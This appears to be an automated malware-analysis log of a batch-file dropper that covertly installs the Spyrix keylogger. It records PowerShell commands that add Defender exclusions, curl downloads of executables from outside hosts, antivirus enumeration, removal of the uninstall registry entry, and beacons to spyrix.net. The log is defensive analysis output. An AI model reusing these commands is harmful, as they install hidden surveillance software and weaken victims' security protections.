Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: id-cmc-addExtensions
Source: qrl.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: qrl.exe	String found in binary or memory: set-addPolicy
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
